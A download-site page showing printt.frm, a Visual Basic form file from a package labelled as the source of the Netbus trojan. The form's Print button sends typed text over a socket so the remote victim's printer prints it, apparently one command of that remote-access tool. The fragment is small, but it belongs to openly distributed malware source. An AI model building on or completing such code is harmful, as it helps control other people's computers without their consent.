⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 printt.frm

📁 大名鼎鼎的Netbus木马源程序.
💻 FRM
字号:
VERSION 5.00
Begin VB.Form Printt 
   BorderStyle     =   1  'Fixed Single
   Caption         =   "Printer"
   ClientHeight    =   2535
   ClientLeft      =   45
   ClientTop       =   360
   ClientWidth     =   3495
   LinkTopic       =   "Form2"
   MaxButton       =   0   'False
   ScaleHeight     =   2535
   ScaleWidth      =   3495
   Begin VB.TextBox Text2 
      Height          =   1935
      Left            =   120
      TabIndex        =   1
      Top             =   120
      Width           =   3255
   End
   Begin VB.CommandButton Command4 
      Caption         =   "Print"
      Height          =   255
      Left            =   120
      TabIndex        =   0
      Top             =   2160
      Width           =   3255
   End
End
Attribute VB_Name = "Printt"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False

Private Sub Command4_Click()
WSsnd Str(Printy) & Text2.text
End Sub

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -